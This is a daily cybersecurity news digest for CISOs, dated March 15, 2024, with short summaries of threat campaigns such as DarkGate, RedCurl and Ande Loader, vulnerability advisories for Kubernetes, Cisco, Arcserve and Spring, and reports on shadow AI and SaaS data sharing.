CISO Daily Update - March 15, 2024
CISO Daily Update

CISO Daily Update - March 15, 2024

NEW DEVELOPMENTS

SIM Swappers Now Stealing Phone Numbers From eSIMs

Source: Bleeping Computer

SIM swappers have evolved their tactics to target phone numbers stored on eSIMs–exploiting the remote reprogramming capabilities of these digital cards found in modern smartphones. Russian cybersecurity firm F.A.C.C.T. highlights a surge in attacks where criminals hijack eSIMs to access bank accounts and other online services. By compromising a user's account with the service provider, attackers port the victim's number to their own device to gain access to authentication codes and two-factor authentication. To mitigate these threats, experts advise users to employ robust security measures, including complex passwords, two-factor authentication, and additional protection for sensitive accounts like e-banking and cryptocurrency wallets.

Article Link


Meta Sues Former VP After Defection to AI Startup

Source: Infosecurity Magazine

Meta initiated legal action against its former Vice President of infrastructure, Dipinder Singh (TS) Khurana, accusing him of unlawfully taking employee and business contracts before resigning and joining an AI startup. The lawsuit was filed in a California state court on February 29, alleging Khurana violated his contract by absconding with proprietary and confidential documents related to Meta's business and personnel. Khurana purportedly transferred these documents to his personal Google Drive and Dropbox accounts before departing for Omniva, a stealth AI startup he joined in June 2023 along with several former Meta employees. A recent Code42 report found that 85% of cybersecurity leaders anticipate increased data loss from insider events over the next year.

Article Link


RedLine Malware Top Credential Stealer of Last 6 Months

Source: SC Magazine

RedLine malware has emerged as the predominant credential stealer in the past six months–used by threat actors to steal over 170 million passwords. This represents 47% of all cyber incidents involving stolen passwords, overshadowing its closest competitor, Vidar, which stole over 65 million passwords (17%). Rounding out the top three is Raccoon Stealer, tied to over 42 million stolen passwords (11.7%). This data was compiled from breached password lists by KrakenLabs and Specops, reinforcing the pervasive threat of credential-stealing malware.

Article Link


DarkGate Malware Exploited Recently Patched Microsoft Flaw in Zero-Day Attack

Source: The Hacker News

A DarkGate malware campaign recently exploited a previously patched Microsoft Windows security flaw (CVE-2024-21412) by utilizing deceptive PDFs containing redirects to distribute malicious installers. This campaign, orchestrated by a threat actor known as Water Hydra (or DarkCasino), targeted financial institutions with malware. The attack chain involves phishing emails with embedded links, open redirects, and fake software installers, reinforcing the importance of vigilance and caution when interacting with unsolicited attachments or downloads.?

Article Link


Tech Support Firms Restoro, Reimage Fined $26 Million for Scare Tactics

Source: Bleeping Computer

Restoro and Reimage, two tech support firms, face a $26 million fine for employing scare tactics to coerce customers into purchasing unnecessary computer repair services. The U.S. Federal Trade Commission (FTC) took action against these Cyprus-based companies, citing deceptive marketing practices that preyed on consumers, particularly older individuals. The companies utilized fake system warnings, misrepresented scan results, and pressured customers into paying for repair plans. The FTC's proposed order prohibits Restoro and Reimage from engaging in deceptive telemarketing and misrepresenting security or performance issues to manipulate consumers.

Article Link


RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage

Source: The Hacker News

The Russian-speaking cybercrime group RedCurl was identified as exploiting the Program Compatibility Assistant (PCA), a legitimate Microsoft Windows component, for malicious purposes. RedCurl, also known as Earth Kapre and Red Wolf, has been active since at least 2018 and is engaged in corporate cyber espionage targeting entities across various countries. The group employs sophisticated tactics, including abusing PowerShell, curl, and PCA, to execute malicious commands and evade detection within targeted networks.

Article Link


Ande Loader Malware Targets Manufacturing Sector in North America

Source: The Hacker News

The threat actor Blind Eagle, also known as APT-C-36, has intensified its cyber operations by utilizing Ande Loader malware to deploy remote access trojans (RATs)--specifically targeting individuals in the Spanish-speaking manufacturing sector in North America. Their modus operandi involves phishing emails containing password-protected RAR or BZ2 archives, concealing malicious VBScript files. Once executed, these scripts establish persistence and initiate Ande Loader to facilitate the download and execution of RAT payloads. Blind Eagle's choice of RAT payloads varies based on the attack vector. In some instances, they deliver Remcos RAT via RAR archives, while in others, NjRAT is distributed through BZ2 archives disseminated via Discord content delivery network (CDN) links. To obfuscate their malware, Blind Eagle adds layers of encryption and concealment.

Article Link


VULNERABILITIES TO WATCH

Patch Now: Kubernetes RCE Flaw Allows Full Takeover of Windows Nodes

Source: Darkreading

A major vulnerability in Kubernetes has been identified (CVE-2023-5528). This vulnerability allows attackers to run programs on Windows nodes in Kubernetes clusters with System rights. By changing Kubernetes volumes, attackers can extend their access to administrator privileges on compromised nodes. Versions of Kubernetes default installations older than 1.28.4 are vulnerable, and patching is required to reduce the danger of full node takeover. The discovery emphasizes the criticality of role-based access control (RBAC) and verification of Kubernetes configurations.

Article Link


Cisco Fixed High-Severity Elevation of Privilege and DoS Bugs

Source: Security Affairs

Cisco released patches to address several high-severity vulnerabilities in its IOS XR software, including flaws that could result in privilege elevation and denial-of-service (DoS) conditions. One vulnerability (CVE-2024-20320) allows an authenticated, local attacker to escalate privileges on affected devices using SSH client commands. Another vulnerability (CVE-2024-20318) allows an unauthenticated, nearby attacker to reset line card network processors, resulting in DoS conditions in Layer 2 Ethernet services. A third vulnerability (CVE-2024-20327) affects ASR 9000 series routers that use PPP over Ethernet (PPPoE) termination, allowing an unauthenticated, nearby attacker to crash the ppp_ma process and cause a DoS condition for PPPoE traffic. Cisco has not observed any attacks that exploit these vulnerabilities in the wild, but users should apply updates as soon as possible.

Article Link


Critical Vulnerabilities in Arcserve UDP Software Demand Urgent Action

Source: SecurityOnline.info

Security researchers from Tenable uncovered a critical chain of vulnerabilities within Arcserve Unified Data Protection (UDP), a widely used backup and disaster recovery solution. These vulnerabilities tracked as CVE-2024-0799, CVE-2024-0800, and CVE-2024-0801, affect versions 9.2 and 8.1 of Arcserve UDP, potentially allowing attackers to bypass authentication, upload malicious files, and disrupt critical backup systems. Immediate action is necessary to patch these vulnerabilities.

Article Link


CVE-2024-22259: Spring Framework Update Fixes High-Severity Flaw

Source: SecurityOnline.info

A high-severity vulnerability, CVE-2024-22259, has been identified in the Spring Framework, a widely used component in Java-based applications. This flaw affects applications utilizing the UriComponentsBuilder functionality to process URLs from external sources. Attackers could exploit this vulnerability to conduct open redirect attacks or server-side request forgery (SSRF), potentially leading to phishing attacks or unauthorized data access. Immediate action is necessary to upgrade affected Spring Framework versions to mitigate these risks and ensure application security.

Article Link


SPECIAL REPORTS

Shadow AI – Should I be Worried?

Source: Security Week

The proliferation of AI tools, particularly those utilizing Generative AI like ChatGPT, has raised concerns about potential security and privacy risks for organizations. With approximately 12,000 AI tools available, promising assistance across a wide range of job tasks, employers face challenges in controlling their usage effectively. Despite employees' growing adoption of these tools, many organizations lack clear policies and safeguards to manage AI risks, leading to potential data leakage and compliance issues. Furthermore, most of these AI tools lack robust privacy and data retention policies, leaving organizations vulnerable to unforeseen consequences. Security concerns also extend to prompt injection attacks, account takeovers, and the potential misuse of sensitive corporate data. While some organizations opt to implement blanket bans on AI tools, this approach may drive users to seek alternative, unvetted tools, ultimately exacerbating security risks. Instead, organizations should prioritize educating users on responsible AI use and develop pragmatic policies that balance security concerns with the potential productivity gains offered by AI tools.?

Article Link


CISA Launches 911 Cybersecurity Hub: Empowering Emergency Responders

Source: The Cyber Express

The Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with SAFECOM and the National Council of Statewide Interoperability Coordinators (NCSWIC), launched the 911 Cybersecurity Resource Hub for nationwide Emergency Communications Centers (ECCs). This initiative provides ECCs with streamlined access to cybersecurity resources and expertise. Through close collaboration with state and local stakeholders, CISA ensures that the hub remains responsive to evolving cybersecurity challenges ECCs face. CISA's other initiatives, such as the Regional Resiliency Assessment Program (RRAP) and the Joint Cyber Defense Collaborative (JCDC), are also in place to enhance critical infrastructure resilience and combat cyber threats.?

Article Link


New Report Suggests Surge in SaaS Assets, Employee Data Sharing

Source: Infosecurity Magazine

Recent DoControl research indicates a substantial spike in software-as-a-service (SaaS) assets, with an average of 286,000 new assets generated weekly in 2023–increasing 189% from the previous year. The report also highlights the frequency of insider threats, finding that one in every six employees shares company material via personal email accounts. Outdated access permissions and overly-permissioned third-party OAuth apps create additional security challenges. To overcome these issues, the research emphasizes that businesses must create centralized, automated data access controls for SaaS services.

Article Link

Brian Neuhaus

Cybersecurity Leader & CISO driving innovation at Neuhaus Ventures | Servant leader to making this planet a safer place

11 个月

Nice wrap-up

回复

要查看或添加评论,请登录

Marcos Christodonte II的更多文章

  • Rethinking Enterprise Cybersecurity Strategies in an Era of Change

    Rethinking Enterprise Cybersecurity Strategies in an Era of Change

    As businesses race to embrace AI, evolve their business models, and navigate the complexities of digital…

    2 条评论
  • CISO Daily Update - December 19, 2024

    CISO Daily Update - December 19, 2024

    NEW DEVELOPMENTS Hacker Leaks Cisco Data Source: Security Week IntelBroker leaked 2.9 GB of data allegedly stolen from…

    3 条评论
  • CISO Daily Update - December 18, 2024

    CISO Daily Update - December 18, 2024

    NEW: Watch the replay of my keynote on Leveraged Cybersecurity: Staying Ahead of (Not Behind) the Pace of Change:…

  • CISO Daily Update - December 16, 2024

    CISO Daily Update - December 16, 2024

    NEW DEVELOPMENTS Rhode Island Says Personal Data Likely Breached in Social Services Cyberattack Source: TechCrunch A…

    1 条评论
  • CISO Daily Update - December 13, 2024

    CISO Daily Update - December 13, 2024

    NEW DEVELOPMENTS US Bitcoin ATM Operator Byte Federal Suffered a Data Breach Source: Security Affairs US Bitcoin ATM…

  • CISO Daily Update - December 12, 2024

    CISO Daily Update - December 12, 2024

    NEW DEVELOPMENTS Security Arteries Burst: 446K Exposed in Vein Treatment Center Breach Source: Cybernews The Center for…

  • CISO Daily Update - December 11, 2024

    CISO Daily Update - December 11, 2024

    NEW DEVELOPMENTS Breach of Booking Giant Sabre Exposes Tens of Thousands Source: Cybernews A ransomware attack on…

    1 条评论
  • CISO Daily Update - December 10, 2024

    CISO Daily Update - December 10, 2024

    NEW DEVELOPMENTS One Email to Expose Them All: Single User Breach Exposes Data of 11K Children Source: Cybernews A…

  • CISO Daily Update - December 9, 2024

    CISO Daily Update - December 9, 2024

    NEW DEVELOPMENTS Anna Jaques Hospital Ransomware Breach Exposed Data of 300K Patients Source: Bleeping Computer Anna…

  • CISO Daily Update - December 6, 2024

    CISO Daily Update - December 6, 2024

    NEW DEVELOPMENTS Researchers Uncover 4-Month Cyberattack on U.S.

社区洞察

其他会员也浏览了